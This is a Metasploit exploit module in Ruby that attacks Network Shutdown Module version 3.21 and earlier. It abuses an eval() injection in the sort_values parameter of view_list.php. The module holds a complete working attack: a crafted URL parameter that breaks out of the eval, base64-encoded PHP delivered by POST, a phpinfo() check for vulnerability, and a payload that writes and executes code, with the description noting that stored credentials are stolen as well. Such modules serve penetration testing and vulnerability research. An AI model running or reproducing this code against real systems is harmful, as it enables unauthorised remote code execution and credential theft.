Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient
 include Msf::Exploit::PhpEXE

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection',
   'Description'    => %q{
    This module exploits a vulnerability in lib/dbtools.inc which uses
    unsanitized user input inside a eval() call. Additionally the base64 encoded
    user credentials are extracted from the database of the application. Please
    note that in order to be able to steal credentials, the vulnerable service
    must have at least one USV module (an entry in the "nodes" table in mgedb.db)
   },
   'Author'         =>
    [
     'h0ng10',  # original discovery, msf module
     'sinn3r'   # PhpEXE shizzle
    ],
   'License'        => MSF_LICENSE,
   'References'     =>
    [
     ['OSVDB', '83199'],
     ['URL', 'http://secunia.com/advisories/49103/']
    ],
   'Payload'        =>
    {
     'DisableNops' => true,
     'Space'       => 4000
    },
   'Platform'       => ['php', 'linux'],
   'Arch'           => ARCH_PHP,

   'Targets'        =>
    [
     [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
     [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
    ],
   'DefaultTarget'  => 0,
   'Privileged'     => true,
   'DisclosureDate' => 'Jun 26 2012'
  ))

  register_options(
   [
    Opt::RPORT(4679)
   ], self.class)
 end

 def check
  # we use a call to phpinfo() for verification
  res = execute_php_code("phpinfo();die();")

  if not res or res.code != 200
   print_error("Failed: Error requesting page")
   return CheckCode::Unknown
  end

  return CheckCode::Vulnerable if (res.body =~ /This program makes use of the Zend/)
  return CheckCode::Safe
 end

 def execute_php_code(code, opts = {})
  param_name = rand_text_alpha(6)
  padding    = rand_text_alpha(6)
  url_param  = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"

  res = send_request_cgi(
   {
    'uri'   =>  '/view_list.php',
    'method' => 'POST',
    'vars_get' =>
     {
      'paneStatusListSortBy' => url_param,
     },
    'vars_post' =>
     {
      param_name => Rex::Text.encode_base64(code),
     },
    'headers' =>
     {
      'Connection' => 'Close',
     }
   })
 end

 def no_php_tags(p)
  p = p.gsub(/^<\?php /, '')
  p.gsub(/ \?\>$/, '')
 end

 def exploit
  print_status("#{rhost}:#{rport} - Sending payload")

  unlink = (target['Platform'] == 'linux') ? true : false
  p      = no_php_tags(get_write_exec_payload(:unlink_self => unlink))

  execute_php_code(p)
  handler
 end
end